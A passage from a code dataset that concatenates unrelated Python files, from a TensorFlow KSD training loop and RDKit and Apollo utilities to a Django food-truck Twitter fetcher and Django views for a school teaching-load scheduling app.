acc = np.mean(prob > .5)
llh = np.mean(np.log(prob))
return acc, llh
G_sample = generator(z)
ksd = ksd_emp(G_sample)
solver_KSD = optimizer(learning_rate=lr).minimize(ksd, var_list=theta_G)
#######################################################################################################################
sess = tf.Session()
sess.run(tf.global_variables_initializer())
ksd_loss = np.zeros(n_iter)
acc = np.zeros(1 + (n_iter // iter_eval))
loglik = np.zeros(1 + (n_iter // iter_eval))
for it in range(n_iter):
batch = [i % N for i in range(it * mb_size_x, (it + 1) * mb_size_x)]
X_b = X_train[batch, :]
y_b = y_train[batch]
_, loss_curr = sess.run([solver_KSD, ksd], feed_dict={Xs: X_b, ys: y_b, z: sample_z(mb_size, z_dim)})
ksd_loss[it] = loss_curr
if it % iter_eval == 0:
post = sess.run(G_sample, feed_dict={z: sample_z(mb_size, z_dim)})
post_eval = evaluation(post)
acc[it // iter_eval] = post_eval[0]
loglik[it // iter_eval] = post_eval[1]
plt.plot(ksd)
plt.axvline(np.argmin(ksd_loss), color="r")
plt.title("KSD loss (min={:.04f} at iter {})".format(np.min(ksd_loss), np.argmin(ksd_loss)))
plt.show()
plt.close()
plt.plot(np.arange(len(acc)) * iter_eval, acc)
plt.ylim(top=0.8)
plt.axhline(0.75, color="g")
plt.title("Accuracy (max={:0.4f} at iter {})".format(np.max(acc), np.argmax(acc)*iter_eval))
plt.show()
plt.close()
|
4,839 | 4b552731fcfc661c7ad2d63c7c47f79c43a8ae5e | #!/usr/bin/env python
###############################################################################
# Copyright 2017 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
"""Global config access."""
import os
import google.protobuf.text_format as text_format
import gflags
import glog
import modules.hmi.proto.config_pb2 as config_pb2
class Config(object):
"""Global config."""
pb_singleton = None
hardware_dict = None
module_dict = None
tool_dict = None
apollo_root = os.path.join(os.path.dirname(__file__), '../../..')
@classmethod
def get_pb(cls):
"""Get a pb instance from the config."""
if cls.pb_singleton is None:
# Init the config by reading conf file.
with open(gflags.FLAGS.conf, 'r') as conf_file:
cls.pb_singleton = text_format.Merge(conf_file.read(),
config_pb2.Config())
glog.info('Get config: {}'.format(cls.pb_singleton))
return cls.pb_singleton
@classmethod
def get_hardware(cls, hardware_name):
"""Get Hardware config by name."""
if cls.hardware_dict is None:
# Init the hardware_dict once.
cls.hardware_dict = {hw.name: hw for hw in cls.get_pb().hardware}
return cls.hardware_dict.get(hardware_name)
@classmethod
def get_module(cls, module_name):
"""Get module config by name."""
if cls.module_dict is None:
# Init the module_dict once.
cls.module_dict = {mod.name: mod for mod in cls.get_pb().modules}
return cls.module_dict.get(module_name)
@classmethod
def get_tool(cls, tool_name):
"""Get module config by name."""
if cls.tool_dict is None:
# Init the module_dict once.
cls.tool_dict = {tool.name: tool for tool in cls.get_pb().tools}
return cls.tool_dict.get(tool_name)
@classmethod
def get_realpath(cls, path_str):
"""
Get realpath from a path string in config.
Starting with '/' indicates an absolute path, otherwise it will be taken
as a relative path of the Apollo root.
"""
if path_str.startswith('/'):
return path_str
return os.path.abspath(os.path.join(cls.apollo_root, path_str))
|
4,840 | 4b63df35b36b35f1b886b8981519921a9e697a42 | #
# Copyright (C) 2005-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
import argparse
import re
import os
from rdkit import Chem
from rdkit import RDLogger
from rdkit.Chem import ChemicalFeatures
logger = RDLogger.logger()
splitExpr = re.compile(r'[ \t,]')
def GetAtomFeatInfo(factory, mol):
res = [None] * mol.GetNumAtoms()
feats = factory.GetFeaturesForMol(mol)
for feat in feats:
ids = feat.GetAtomIds()
feature = "%s-%s" % (feat.GetFamily(), feat.GetType())
for id_ in ids:
if res[id_] is None:
res[id_] = []
res[id_].append(feature)
return res
def initParser():
""" Initialize the parser """
parser = argparse.ArgumentParser(description='Determine pharmacophore features of molecules',
epilog=_splashMessage,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-r', dest='reverseIt', default=False, action='store_true',
help='Set to get atoms lists for each feature.')
parser.add_argument('-n', dest='maxLines', default=-1, help=argparse.SUPPRESS, type=int)
parser.add_argument('fdefFilename', type=existingFile,
help='Pharmacophore feature definition file')
parser.add_argument('smilesFilename', type=existingFile,
help='The smiles file should have SMILES in the first column')
return parser
_splashMessage = """
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
FeatFinderCLI
Part of the RDKit (http://www.rdkit.org)
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
"""
def existingFile(filename):
""" 'type' for argparse - check that filename exists """
if not os.path.exists(filename):
raise argparse.ArgumentTypeError("{0} does not exist".format(filename))
return filename
def processArgs(args, parser):
try:
factory = ChemicalFeatures.BuildFeatureFactory(args.fdefFilename)
except Exception:
parser.error("Could not parse Fdef file {0.fdefFilename}.".format(args))
with open(args.smilesFilename) as inF:
for lineNo, line in enumerate(inF, 1):
if lineNo == args.maxLines + 1:
break
smi = splitExpr.split(line.strip())[0].strip()
mol = Chem.MolFromSmiles(smi)
if mol is None:
logger.warning("Could not process smiles '%s' on line %d." % (smi, lineNo))
continue
print('Mol-%d\t%s' % (lineNo, smi))
if args.reverseIt:
feats = factory.GetFeaturesForMol(mol)
for feat in feats:
print('\t%s-%s: ' % (feat.GetFamily(), feat.GetType()), end='')
print(', '.join([str(x) for x in feat.GetAtomIds()]))
else:
featInfo = GetAtomFeatInfo(factory, mol)
for i, v in enumerate(featInfo):
print('\t% 2s(%d)' % (mol.GetAtomWithIdx(i).GetSymbol(), i + 1), end='')
if v:
print('\t', ', '.join(v))
else:
print()
def main():
""" Main application """
parser = initParser()
args = parser.parse_args()
processArgs(args, parser)
if __name__ == '__main__':
main()
|
4,841 | f3f5b14917c89c5bc2866dd56e212bd3ec8af1cd | import math
def Distance(t1, t2):
RADIUS = 6371000. # earth's mean radius in km
p1 = [0, 0]
p2 = [0, 0]
p1[0] = t1[0] * math.pi / 180.
p1[1] = t1[1] * math.pi / 180.
p2[0] = t2[0] * math.pi / 180.
p2[1] = t2[1] * math.pi / 180.
d_lat = (p2[0] - p1[0])
d_lon = (p2[1] - p1[1])
a = math.sin(d_lat / 2) * math.sin(d_lat / 2) + math.cos(
p1[0]) * math.cos(p2[0]) * math.sin(d_lon / 2) * math.sin(d_lon / 2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = RADIUS * c
return d
def tile_number(lon_deg, lat_deg, zoom):
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((lat_deg + 90.0) / 180.0 * n)
return (xtile, ytile) |
4,842 | f720eaf1ea96ccc70730e8ba1513e1a2bb95d29d | import datetime
import time
import rfc822
from django.conf import settings
from urllib2 import Request, urlopen, URLError, HTTPError
from urllib import urlencode
import re
import string
try:
import django.utils.simplejson as json
except:
import json
from django.core.cache import cache
from tagging.models import Tag
from foodtruck.models import *
from foodtruck.tokens import *
import oauth2 as oauth
def fetch_json(url, service, list_key=None):
fetched = urlopen(url).read()
data = json.loads(fetched)
if list_key:
data = data[list_key]
return data
def oauth_req(url, key, secret, http_method="GET", post_body=None,http_headers=None):
consumer = oauth.Consumer(key=CONSUMER_KEY, secret=CONSUMER_SECRET)
token = oauth.Token(key=key, secret=secret)
client = oauth.Client(consumer, token)
resp, content = client.request(
url,
method=http_method,
body=post_body,
headers=http_headers,
force_auth_header=True
)
return content
def get_all_tweets():
from dateutil.parser import parse, tz
url = LIST_URL
HERE = tz.tzlocal()
if cache.get('truck_tweets'):
tweets = cache.get('truck_tweets')
else:
tweets = []
all_tweets = oauth_req(url, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
data = json.loads(all_tweets)
for t in data:
m = dict(
name = t['user']['screen_name'],
pic_url = t['user']['profile_image_url'],
text = t['text'],
timestamp = parse(t['created_at']).astimezone(HERE),
url = 'http://twitter.com/'+t['user']['screen_name']+'/statuses/'+str(t['id']),
)
tweets += [m]
cache.set('truck_tweets',tweets, 62)
return tweets
def filter_trucks(hood):
tweets = get_all_tweets()
n = Hood.objects.get(id=hood)
tags = n.tags.all()
filtered = {'hood':n.name, 'tags':tags}
filtered['tweets'] = []
for t in tweets:
for w in tags:
if string.find(t['text'].lower(), w.name.lower()) > 0:
filtered['tweets'] += [t]
break
cache.set((('filtered_%s' % hood)), filtered, 62)
return filtered
def get_truck_names():
p = open('truck.cursor','r')
try: last_cursor = int(p.read())
except: last_cursor=1353949495935930905 # this is just the last cursor number i looked up, to save on API calls -- can change.
p.close()
url = LIST_MEMBERS_URL
get_truck_list = oauth_req(url, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
truck_list = json.loads(get_truck_list)
all_trucks = truck_list['users']
cursor = truck_list['next_cursor']
f = open('truck.cursor','w')
f.write(str(cursor))
f.close
while cursor > last_cursor:
truck_url = LIST_MEMBERS_URL +'?cursor=' + str(cursor)
get_truck_list = oauth_req(truck_url,OAUTH_TOKEN,OAUTH_TOKEN_SECRET)
truck_list = json.loads(get_truck_list)
all_trucks += truck_list['users']
cursor = truck_list['next_cursor']
for truck in all_trucks:
description=truck['description'] or ''
truck_url= truck['url'] or 'http://twitter.com/'+truck['screen_name']
profile_icon= truck['profile_image_url'] or ''
real_name=truck['name'] or truck['screen_name']
t = Truck.objects.get_or_create(id_str__exact=truck['id_str'], defaults = {'name':truck['screen_name'], 'description':description, 'profile_icon':profile_icon, 'truck_url':truck_url, 'geo_enabled':truck['geo_enabled'], 'real_name':real_name, 'id_str':truck['id_str']})
if __name__=='__main__':
import sys
try:
func = sys.argv[1]
except: func = None
if func:
try:
exec 'print %s' % func
except:
print "Error: incorrect syntax '%s'" % func
else: print "Please name your function"
|
4,843 | a9ebd323d4b91c7e6a7e7179329ae80e22774927 | import io
import xlsxwriter
import zipfile
from django.conf import settings
from django.http import Http404, HttpResponse
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.views.generic.detail import DetailView
from django.shortcuts import render, get_object_or_404, redirect
from .viewsAlexis import *
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from carga_horaria.models import Periodo, Colegio, Plan
from carga_horaria.formsDani import PeriodoForm, ColegioForm, PlanForm
from django.core.urlresolvers import reverse_lazy, reverse
from guardian.shortcuts import get_objects_for_user
from guardian.shortcuts import assign_perm
from guardian.shortcuts import remove_perm
from wkhtmltopdf.views import PDFTemplateResponse, PDFTemplateView
from .models import Nivel
from .models import Profesor
from .models import Asistente
from .models import Periodo
from .models import Asignacion
from .models import AsignacionExtra
from .models import AsignacionNoAula
from .models import Colegio
from .forms import AsignacionForm
from .forms import AsignacionUpdateForm
from .forms import AsignacionFUAForm
from .forms import AsignacionNoAulaFUAForm
from .forms import AsignacionFUAUpdateForm
from .forms import AsignacionNoAulaFUAUpdateForm
from .forms import AsignacionExtraForm
from .forms import AsignacionExtraUpdateForm
from .forms import AsignacionNoAulaForm
from .forms import AsignacionNoAulaUpdateForm
from .models import AsignacionAsistente
from .forms import AsignacionAsistenteForm
from .forms import AssignPermForm
from .formsDani import PlantillaPlanForm
@login_required
def assign(request):
if not request.user.is_superuser:
raise Http404
year = request.session.get('periodo', 2020)
if request.method == 'POST':
form = AssignPermForm(request.POST, year=year)
if form.is_valid():
user = form.cleaned_data['usuario']
# clear perms first
remove_perm('carga_horaria.change_colegio', user, get_objects_for_user(user, 'carga_horaria.change_colegio').filter(periode=year))
for c in form.cleaned_data['colegios']:
assign_perm('change_colegio', user, c)
form = AssignPermForm(year=year)
return render(request, 'carga_horaria/assign.html', {'form': form})
@login_required
def switch_periodo(request, year=2021):
request.session['periodo'] = year
try:
del request.session['colegio__pk']
del request.session['colegio__nombre']
except KeyError:
pass
return redirect('carga-horaria:home')
@login_required
def switch(request, pk=None):
if pk:
colegio = get_object_or_404(Colegio, pk=pk)
request.session['colegio__pk'] = colegio.pk
request.session['colegio__nombre'] = colegio.nombre
return redirect('carga-horaria:home')
colegios = get_objects_for_user(request.user, "carga_horaria.change_colegio", Colegio.objects.filter(periode=request.session.get('periodo', 2020)))
return render(request, 'carga_horaria/switch.html', {'colegios': colegios})
@login_required
def clear(request):
del request.session['colegio__pk']
del request.session['colegio__nombre']
return redirect('carga-horaria:home')
@login_required
def home(request):
return render(request, 'carga_horaria/home.html')
@login_required
def anexo(request, pk):
p = get_object_or_404(Profesor, pk=pk)
colegio = Colegio.objects.get(pk=request.session['colegio__pk'])
response = PDFTemplateResponse(request=request,
template='carga_horaria/profesor/anexo_profesor.html',
filename='anexo1.pdf',
context={'profesor': p,
'colegio': colegio,
'periodo': request.session.get('periodo', 2020)},
show_content_in_browser=settings.DEBUG)
return response
@login_required
def anexos(request):
profesores = get_for_user(request, Profesor.objects.all(), 'colegio__pk', request.user)
mem_zip = io.BytesIO()
with zipfile.ZipFile(mem_zip, mode="w", compression=zipfile.ZIP_DEFLATED) as zf:
for pp in profesores:
zf.writestr(*pp.generar_anexo_1())
response = HttpResponse(mem_zip.getvalue(), content_type='applicaton/zip')
response['Content-Disposition'] = 'attachment; filename="anexos1.zip"'
return response
@login_required
def anexo_asistente(request, pk):
p = get_object_or_404(Asistente, pk=pk)
colegio = Colegio.objects.get(pk=request.session['colegio__pk'])
response = PDFTemplateResponse(request=request,
template='carga_horaria/asistente/anexo_asistente.html',
filename='anexo1.pdf',
context={'profesor': p,
'colegio': colegio,
'periodo': request.session.get('periodo', 2020)},
show_content_in_browser=settings.DEBUG)
return response
@login_required
def anexos_asistentes(request):
profesores = get_for_user(request, Asistente.objects.all(), 'colegio__pk', request.user)
mem_zip = io.BytesIO()
with zipfile.ZipFile(mem_zip, mode="w", compression=zipfile.ZIP_DEFLATED) as zf:
for pp in profesores:
zf.writestr(*pp.generar_anexo_1())
response = HttpResponse(mem_zip.getvalue(), content_type='applicaton/zip')
response['Content-Disposition'] = 'attachment; filename="anexos1.zip"'
return response
@login_required
def profesores_pdf(request):
profesores = get_for_user(request, Profesor.objects.all(), 'colegio__pk', request.user)
response = PDFTemplateResponse(request=request,
template='carga_horaria/profesor/listado_profesor_pdf.html',
filename='listado_profesores.pdf',
context={'profesores': profesores},
show_content_in_browser=settings.DEBUG)
return response
@login_required
def asistentes_pdf(request):
asistentes = get_for_user(request, Asistente.objects.all(), 'colegio__pk', request.user)
response = PDFTemplateResponse(request=request,
template='carga_horaria/asistente/listado_asistente_pdf.html',
filename='listado_asistentes.pdf',
context={'asistentes': asistentes},
show_content_in_browser=settings.DEBUG)
return response
@login_required
def periodo_pdf(request, pk):
periodo = get_object_or_404(Periodo, pk=pk)
response = PDFTemplateResponse(request=request,
template='carga_horaria/periodo/periodo_pdf.html',
filename='carga_horaria.pdf',
context={'object': periodo},
show_content_in_browser=settings.DEBUG)
return response
@login_required
def plan_refresh(request, pk):
plan = get_object_or_404(Plan, pk=pk)
plan.refresh_asignaturas()
messages.success(request, "Se han actualizado los cursos asociados al plan ID: {}".format(plan.pk))
return redirect('carga-horaria:planes')
# class AnexoView(PDFTemplateView):
# template_name = 'carga_horaria/profesor/anexo_profesor.html'
# filename = 'anexo1.pdf'
# def get(self, request, *args, **kwargs):
# pk = kwargs.pop('pk')
# self.p = get_object_or_404(Profesor, pk=pk)
# self.ax = [{'descripcion': 'Planificación', 'curso': '', 'horas': self.p.horas_planificacion},
# {'descripcion': 'Recreo', 'curso': '', 'horas': self.p.horas_recreo}] + list(self.p.asignacionextra_set.all())
# return super(AnexoView, self).get(request, *args, **kwargs)
# def get_context_data(self, *args, **kwargs):
# ctx = super(AnexoView, self).get_context_data(*args, **kwargs)
# ctx.update({'asignaciones': self.p.asignacion_set.all(),
# 'asignaciones_extra': self.ax,
# 'profesor': self.p})
# anexo = AnexoView.as_view()
"""
Comienzo Crud Periodos
"""
class PeriodoListView(LoginRequiredMixin, GetObjectsForUserMixin, ListView):
"""
Listado de periodos
"""
model = Periodo
lookup = 'colegio__pk'
template_name = 'carga_horaria/periodo/listado_periodos.html'
search_fields = ['nombre', 'colegio']
paginate_by = 10
def get_context_data(self, *args, **kwargs):
ctx = super(PeriodoListView, self).get_context_data(*args, **kwargs)
ox = ctx['object_list']
ordering = {str(value): index for index, value in enumerate(Nivel)}
ctx['object_list'] = sorted(ox, key=lambda x: ordering["Nivel."+x.plan.nivel])
# added for convenience, pasted from AsignaturaBaseListView
ctx['levels'] = [(tag.name, tag.value) for tag in Nivel]
ctx['nivel_actual'] = self.request.GET.get('nivel')
return ctx
def get_queryset(self):
qs = super().get_queryset()
nivel = self.request.GET.get('nivel')
if nivel:
qs = qs.filter(plan__nivel=nivel)
return qs
class PeriodoDetailView(LoginRequiredMixin, DetailView):
"""
Detalle de Periodo
"""
model = Periodo
template_name = 'carga_horaria/periodo/detalle_periodo.html'
class PeriodoCreateView(LoginRequiredMixin, CreateView):
model = Periodo
form_class = PeriodoForm
template_name = 'carga_horaria/periodo/nuevo_periodo.html'
success_url = reverse_lazy('carga-horaria:periodos')
def get_form_kwargs(self, *args, **kwargs):
kwargs = super(PeriodoCreateView, self).get_form_kwargs(*args, **kwargs)
kwargs.update({'user': self.request.user,
'colegio': self.request.session.get('colegio__pk', None)})
return kwargs
class PeriodoUpdateView(LoginRequiredMixin, UpdateView):
model = Periodo
form_class = PeriodoForm
template_name = 'carga_horaria/periodo/editar_periodo.html'
def get_form_kwargs(self, *args, **kwargs):
kwargs = super(PeriodoUpdateView, self).get_form_kwargs(*args, **kwargs)
kwargs.update({'user': self.request.user,
'colegio': self.request.session.get('colegio__pk', None)})
return kwargs
def get_success_url(self):
return reverse(
'carga-horaria:periodo',
kwargs={
'pk': self.object.pk,
}
)
class PeriodoDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Periodo
success_url = reverse_lazy('carga-horaria:periodos')
template_name = 'carga_horaria/periodo/eliminar_periodo.html'
def test_func(self):
return self.request.user.is_superuser
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
"""
Fin Crud Periodos
"""
"""
Comienzo Crud Colegios
"""
class ColegioListView(LoginRequiredMixin, GetObjectsForUserMixin, ListView):
"""
Listado de periodos
"""
model = Colegio
lookup = 'pk'
template_name = 'carga_horaria/colegio/listado_colegios.html'
search_fields = ['nombre', 'jec']
paginate_by = 6
class ColegioDetailView(LoginRequiredMixin, ObjPermissionRequiredMixin, DetailView):
"""
Detalle de Colegio
"""
model = Colegio
permission = 'carga_horaria.change_colegio'
template_name = 'carga_horaria/colegio/detalle_colegio.html'
class ColegioCreateView(LoginRequiredMixin, CreateView):
model = Colegio
form_class = ColegioForm
template_name = 'carga_horaria/colegio/nuevo_colegio.html'
success_url = reverse_lazy('carga-horaria:colegios')
# success_message = u"Nuevo periodo %(nombre)s creado satisfactoriamente."
# error_message = "Revise que todos los campos del formulario hayan sido validados correctamente."
def form_valid(self, form):
colegio = form.save(commit=False)
colegio.periode = self.request.session.get('periodo', 2020)
colegio.save()
return redirect(reverse('carga-horaria:colegios'))
class ColegioUpdateView(LoginRequiredMixin, UpdateView):
model = Colegio
form_class = ColegioForm
template_name = 'carga_horaria/colegio/editar_colegio.html'
def get_success_url(self):
return reverse(
'carga-horaria:colegio',
kwargs={
'pk': self.object.pk,
}
)
class ColegioDeleteView(LoginRequiredMixin, DeleteView):
model = Colegio
success_url = reverse_lazy('carga-horaria:colegios')
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
"""
Fin Crud Colegios
"""
"""
Comienzo Crud Planes
"""
class PlanListView(LoginRequiredMixin, GetObjectsForUserMixin, ListView):
"""
Listado de planes
"""
model = Plan
lookup = 'colegio__pk'
template_name = 'carga_horaria/plan/listado_planes.html'
search_fields = ['nombre', 'nivel']
paginate_by = 10
ordering = ['-pk']
class PlanDetailView(LoginRequiredMixin, DetailView):
"""
Detalle de Plan
"""
model = Plan
template_name = 'carga_horaria/plan/detalle_plan.html'
class PlanCreateView(LoginRequiredMixin, CreateView):
model = Plan
form_class = PlanForm
template_name = 'carga_horaria/plan/nuevo_plan.html'
success_url = reverse_lazy('carga-horaria:planes')
# success_message = u"Nuevo periodo %(nombre)s creado satisfactoriamente."
# error_message = "Revise que todos los campos del formulario hayan sido validados correctamente."
def get_form_kwargs(self, *args, **kwargs):
kwargs = super(PlanCreateView, self).get_form_kwargs(*args, **kwargs)
kwargs.update({'user': self.request.user,
'colegio': self.request.session.get('colegio__pk', None)})
return kwargs
@login_required
def crear_desde_plantilla(request):
if request.method == 'POST':
form = PlantillaPlanForm(request.POST)
if form.is_valid():
plantilla = form.cleaned_data['plantilla']
nivel = form.cleaned_data['nivel']
colegio_pk = request.session.get('colegio__pk', None)
if colegio_pk:
colegio = Colegio.objects.get(pk=colegio_pk)
nuevo = Plan.objects.create(nivel=nivel, colegio=colegio)
else:
nuevo = Plan.objects.create(nivel=nivel)
for ab in plantilla.asignaturabase_set.all():
AsignaturaBase.objects.create(nombre=ab.nombre,
plan=nuevo,
horas_jec=ab.horas_jec,
horas_nec=ab.horas_nec)
return redirect('carga-horaria:planes')
else:
form = PlantillaPlanForm()
return render(request, 'carga_horaria/plantilla.html', {'form': form})
class PlanUpdateView(LoginRequiredMixin, UpdateView):
model = Plan
form_class = PlanForm
template_name = 'carga_horaria/plan/editar_plan.html'
def get_success_url(self):
return reverse(
'carga-horaria:plan',
kwargs={
'pk': self.object.pk,
}
)
class PlanDeleteView(LoginRequiredMixin, DeleteView):
model = Plan
success_url = reverse_lazy('carga-horaria:planes')
template_name = 'carga_horaria/plan/eliminar_plan.html'
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
"""
Fin Crud Planes
"""
@login_required
def asignatura_limpiar(request, pk, periodo_pk):
aa = get_object_or_404(Asignatura, pk=pk)
aa.asignacion_set.all().delete()
return redirect(reverse('carga-horaria:periodo', kwargs={'pk': periodo_pk}))
@login_required
def asignatura_dif(request, pk):
pp = get_object_or_404(Periodo, pk=pk)
if request.method == 'POST':
# check first if there are any candidates for merging
nombre = request.POST['asignatura']
colegio_pk = request.session.get('colegio__pk', None)
can_confirm = request.POST.get('can_confirm', False)
if colegio_pk and Asignatura.objects.filter(periodos__colegio=colegio_pk, nombre=nombre) and not can_confirm:
ax = Asignatura.objects.filter(periodos__colegio=colegio_pk, nombre=nombre).distinct()
return render(request, 'carga_horaria/asignatura/asignatura_dif_confirm.html', {'object': pp,
'candidatas': ax})
else:
aa = Asignatura.objects.create(nombre=request.POST['asignatura'],
diferenciada=True,
horas=6)
aa.periodos.add(pp)
return redirect('carga-horaria:periodo', pp.pk)
return render(request, 'carga_horaria/asignatura/asignatura_dif.html', {'object': pp})
@login_required
def asignatura_merge(request, pk, asignatura_pk):
pp = get_object_or_404(Periodo, pk=pk)
aa = get_object_or_404(Asignatura, pk=asignatura_pk)
aa.periodos.add(pp)
return redirect('carga-horaria:periodo', pk)
@login_required
def asignatura_maybe(request, pk):
pp = get_object_or_404(Periodo, pk=pk)
candidatas = Asignatura.objects.filter(periodos__colegio=pp.colegio, combinable=True).exclude(periodos__pk__in=[pk]).distinct()
if candidatas:
return render(request, 'carga_horaria/asignatura/asignatura_maybe.html', {'object': pp, 'candidatas': candidatas})
else:
return redirect('carga-horaria:asignatura__nuevo', pk)
@login_required
def asignar(request, pk, periodo_pk):
aa = get_object_or_404(Asignatura, pk=pk)
if request.method == 'POST':
form = AsignacionForm(request.POST, asignatura=aa, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
if form.is_valid():
asignacion = form.save(commit=False)
asignacion.asignatura = aa
asignacion.save()
return redirect('carga-horaria:periodo', periodo_pk)
else:
form = AsignacionForm(user=request.user, colegio=request.session.get('colegio__pk', None))
return render(request, 'carga_horaria/asignar.html', {'object': aa,
'form': form})
@login_required
def asignar_fua(request, pk, tipo):
pp = get_object_or_404(Profesor, pk=pk)
tipo_display = dict(Asignacion.TIPO_CHOICES)[int(tipo)]
if request.method == 'POST':
form = AsignacionFUAForm(request.POST, profesor=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
if form.is_valid():
asignacion = form.save(commit=False)
asignacion.profesor = pp
asignacion.tipo = tipo
asignacion.save()
return redirect('carga-horaria:profesor', pp.pk)
else:
form = AsignacionFUAForm(user=request.user, colegio=request.session.get('colegio__pk', None))
return render(request, 'carga_horaria/asignar_fua.html', {'object': pp,
'tipo': tipo_display,
'form': form})
@login_required
def asignar_no_aula_fua(request, pk, tipo):
pp = get_object_or_404(Profesor, pk=pk)
tipo_display = dict(AsignacionNoAula.TIPO_CHOICES)[int(tipo)]
if request.method == 'POST':
form = AsignacionNoAulaFUAForm(request.POST, profesor=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
if form.is_valid():
asignacion = form.save(commit=False)
asignacion.profesor = pp
asignacion.tipo = tipo
if asignacion.horas == 0:
asignacion.horas = pp.horas_no_aula_disponibles
asignacion.save()
return redirect('carga-horaria:profesor', pp.pk)
else:
form = AsignacionNoAulaFUAForm(user=request.user, colegio=request.session.get('colegio__pk', None))
return render(request, 'carga_horaria/asignar_no_aula_fua.html', {'profesor': pp,
'tipo': tipo_display,
'form': form})
@login_required
def asignar_extra(request, pk):
pp = get_object_or_404(Profesor, pk=pk)
if request.method == 'POST':
form = AsignacionExtraForm(request.POST, profesor=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
if form.is_valid():
asignacion = form.save(commit=False)
asignacion.profesor = pp
if asignacion.horas == 0:
asignacion.horas = pp.horas_no_lectivas_disponibles
asignacion.save()
return redirect('carga-horaria:profesor', pp.pk)
else:
form = AsignacionExtraForm(user=request.user, colegio=request.session.get('colegio__pk', None))
return render(request, 'carga_horaria/asignar_extra.html', {'profesor': pp,
'form': form})
@login_required
def asignar_no_aula(request, pk):
pp = get_object_or_404(Profesor, pk=pk)
if request.method == 'POST':
form = AsignacionNoAulaForm(request.POST, profesor=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
if form.is_valid():
asignacion = form.save(commit=False)
asignacion.profesor = pp
if asignacion.horas == 0:
asignacion.horas = pp.horas_no_aula_disponibles
asignacion.save()
return redirect('carga-horaria:profesor', pp.pk)
else:
form = AsignacionNoAulaForm(user=request.user, colegio=request.session.get('colegio__pk', None))
return render(request, 'carga_horaria/asignar_no_aula.html', {'profesor': pp,
'form': form})
class AsignacionDeleteView(LoginRequiredMixin, DeleteView):
model = Asignacion
template_name = 'carga_horaria/periodo/eliminar_periodo.html'
def get_success_url(self):
return reverse('carga-horaria:profesor', kwargs={'pk': self.kwargs['profesor_pk']})
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
class AsignacionUpdateView(LoginRequiredMixin, UpdateView):
model = Asignacion
form_class = AsignacionUpdateForm
template_name = 'carga_horaria/asignar_update.html'
def get_success_url(self):
return reverse(
'carga-horaria:profesor',
kwargs={
'pk': self.object.profesor.pk,
}
)
class AsignacionExtraUpdateView(LoginRequiredMixin, UpdateView):
model = AsignacionExtra
form_class = AsignacionExtraUpdateForm
template_name = 'carga_horaria/asignar_extra.html'
def get_context_data(self, *args, **kwargs):
ctx = super(AsignacionExtraUpdateView, self).get_context_data(*args, **kwargs)
ctx['profesor'] = self.object.profesor
return ctx
def get_form_kwargs(self, *args, **kwargs):
pp = get_object_or_404(Profesor, pk=self.kwargs.get('profesor_pk'))
kwargs = super(AsignacionExtraUpdateView, self).get_form_kwargs(*args, **kwargs)
kwargs.update({'profesor': pp,
'user': self.request.user,
'colegio': self.request.session.get('colegio__pk', None)})
return kwargs
def form_valid(self, form):
asignacion = form.save(commit=False)
if asignacion.horas == 0:
asignacion_old = Asignacion.objects.get(pk=asignacion.pk)
asignacion.horas = asignacion.profesor.horas_no_lectivas_disponibles + float(asignacion_old.horas)
asignacion.save()
return redirect(self.get_success_url())
def get_success_url(self):
return reverse(
'carga-horaria:profesor',
kwargs={
'pk': self.object.profesor.pk,
}
)
class AsignacionExtraDeleteView(LoginRequiredMixin, DeleteView):
model = AsignacionExtra
template_name = 'carga_horaria/periodo/eliminar_periodo.html'
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
def get_success_url(self):
return reverse(
'carga-horaria:profesor',
kwargs={
'pk': self.object.profesor.pk,
}
)
class AsignacionNoAulaUpdateView(LoginRequiredMixin, UpdateView):
model = AsignacionNoAula
form_class = AsignacionNoAulaUpdateForm
template_name = 'carga_horaria/asignar_no_aula.html'
def form_valid(self, form):
asignacion = form.save(commit=False)
if asignacion.horas == 0:
asignacion_old = AsignacionNoAula.objects.get(pk=asignacion.pk)
asignacion.horas = asignacion.profesor.horas_no_aula_disponibles + asignacion_old.horas
asignacion.save()
return redirect(self.get_success_url())
def get_context_data(self, *args, **kwargs):
ctx = super(AsignacionNoAulaUpdateView, self).get_context_data(*args, **kwargs)
ctx['profesor'] = self.object.profesor
return ctx
def get_form_kwargs(self, *args, **kwargs):
pp = get_object_or_404(Profesor, pk=self.kwargs.get('profesor_pk'))
kwargs = super(AsignacionNoAulaUpdateView, self).get_form_kwargs(*args, **kwargs)
